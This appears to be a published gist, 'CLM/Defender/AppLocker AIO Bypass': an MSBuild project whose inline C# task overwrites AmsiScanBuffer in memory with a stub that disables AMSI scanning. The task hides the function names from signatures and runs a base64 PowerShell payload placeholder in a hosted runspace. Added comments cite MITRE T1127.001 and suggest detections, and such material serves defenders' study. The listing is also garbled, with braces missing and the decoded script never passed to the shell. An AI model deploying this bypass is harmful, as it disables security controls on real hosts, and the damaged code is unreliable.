
Created May 29, 2019
CLM/Defender/AppLocker AIO Bypass
<!--
  Defensive context: this is an MSBuild project that carries an inline task. When the
  project is built, msbuild.exe compiles the C# inside the Code element and runs it in
  the msbuild.exe process. The technique is catalogued as MITRE T1127.001 (Trusted
  Developer Utilities Proxy Execution: MSBuild).
  Mitigation: on hosts that are not build machines, deny msbuild.exe through application
  control (it is on Microsoft's recommended block list for WDAC).
  Detection: alert on msbuild.exe started by an interactive user or an Office/script
  parent, on project files built from user-writable paths, and on msbuild.exe loading
  System.Management.Automation.dll.
-->
<Project ToolsVersion="4.0" xmlns="">
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe build.csproj -->
<Target Name="Bypass">
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
using System;
using System.Text;
using System.IO;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.ComponentModel;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Runtime.InteropServices;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
// BypassCLM is an MSBuild task class: msbuild.exe compiles it and calls Execute() when
// the project is built, so everything below runs inside the msbuild.exe process.
// NOTE(review): this listing appears to have lost lines in capture (braces, attributes
// and possibly statements); the comments describe only what is shown here.
public class BypassCLM : Task, ITask
// Native Win32 entry points used by Bypass() to locate a function in a loaded module
// and to change the protection of the memory page that holds it.
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
public static extern IntPtr LoadLibrary(string name);
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
// Bypass: tampers with the in-memory copy of the AMSI scan routine in the current process.
// Always returns 0; none of the native calls have their results checked.
static int Bypass()
// The names "AmsiScanBuffer" and "amsi.dll" are assembled from char arrays instead of
// being written as literals, presumably to avoid string-based signatures. Defenders
// should not rely on those literals appearing in the file; match on behavior instead.
char[] chars = { 'A', 'm', 's', 'i', 'S', 'c', 'a', 'n', 'B', 'u', 'f', 'f', 'e', 'r' };
String funcName = string.Join("", chars);
char[] chars2 = { 'a', 'm', 's', 'i', '.', 'd', 'l', 'l' };
String libName = string.Join("", chars2);
// Resolve the address of the export inside this process.
IntPtr Address = GetProcAddress(LoadLibrary(libName), funcName);
UIntPtr size = (UIntPtr)5;
uint p = 0;
// 0x40 is PAGE_EXECUTE_READWRITE: the code page is made writable.
VirtualProtect(Address, size, 0x40, out p);
// The function's first bytes are replaced with a stub that returns the HRESULT
// 0x80070057 (E_INVALIDARG) without scanning, so AMSI-based content inspection stops
// working for this process only; other processes and the file on disk are unchanged.
// Detection: compare the in-memory amsi.dll code section with the on-disk image, and
// watch EDR telemetry for protection changes on amsi.dll pages.
Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
Marshal.Copy(Patch, 0, Address, 6);
return 0;
// Execute: task entry point called by MSBuild. Hosts the PowerShell engine in-process
// through System.Management.Automation rather than starting powershell.exe, so rules
// and detections keyed on the powershell.exe image name do not see this activity.
// Always returns true, which MSBuild treats as task success.
public override bool Execute()
Runspace run = RunspaceFactory.CreateRunspace();
PowerShell shell = PowerShell.Create();
shell.Runspace = run;
// "payload" is a placeholder for a base64 string; it is decoded as UTF-16LE text.
byte[] data = Convert.FromBase64String("payload");
string exec = Encoding.Unicode.GetString(data);
// Runs the PowerShell pipeline and collects its output objects.
// Script block logging and module logging are engine features, so they should still
// record a hosted runspace; verify that in your environment.
Collection<PSObject> output = shell.Invoke();
foreach( PSObject o in output )
// Any PowerShell errors are written to the console prefixed with "Error: ".
foreach( ErrorRecord err in shell.Streams.Error )
Console.Write("Error: " + err.ToString());
return true;